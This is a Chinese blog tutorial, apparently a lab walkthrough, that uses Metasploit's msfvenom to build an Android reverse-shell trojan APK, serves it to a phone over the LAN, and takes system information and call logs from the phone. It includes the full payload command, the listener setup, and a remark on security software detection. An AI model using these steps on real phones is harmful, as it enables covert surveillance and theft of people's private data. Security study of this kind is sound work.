MSF渗透测试android手机

今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF渗透测试android手机。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、Android木马生成

在Kali Linux设备上,我们先生成Android的木马,执行命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.83.199 LPORT=4444 R > exp.apk

即可生成名为exp.apk的木马程序,该命令的执行过程如下所示:
MSF渗透测试android手机_第1张图片

二、Android木马安装与监听

首先,我们在Kali Linux系统上开启监听功能。还是选择使用exploit/multi/handler模块,选择android/meterpreter/reverse_tcp作为payload,并设置LHOST参数为Kali Linux的IP地址,如下所示:
MSF渗透测试android手机_第2张图片
之后,我们执行run,开启监听功能。
我们把生成的木马放到/var/www/html/目录中,并开启apache2服务,以方便我们在Android目标机上下载该木马文件。
我们可以将Kali Linux设备选择桥接模式,并与一台Android手机连接到一个无线局域网上,然后就可以通过Android访问并下载我们生成的木马文件了,Android设备下载木马文件如下所示:
MSF渗透测试android手机_第3张图片
下载下来后,我们可以点击安装(注意:我们的木马毕竟没有经过加壳等处理,因此有可能无法通过手机自带的安全软件拦截,这也是正常的现象),结果如下所示:

三、效果检验

我们点击执行该程序,然后就可以在Kali Linux上看到已经建立了Android到Kali Linux上的连接了,如下所示:
MSF渗透测试android手机_第4张图片
我们可以执行一些命令,获取Android手机的一些信息,如下所示:
MSF渗透测试android手机_第5张图片
在上图中,我们执行并获取了Android手机的系统信息和通过记录信息,一共获取到760条通话记录,通话记录(部分)如下所示:
MSF渗透测试android手机_第6张图片
从以上可知,我们使用MSF渗透测试Android手机成功!
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

你可能感兴趣的:(Kali,Linux,android,MSF,信息安全,渗透测试,kali,Linux)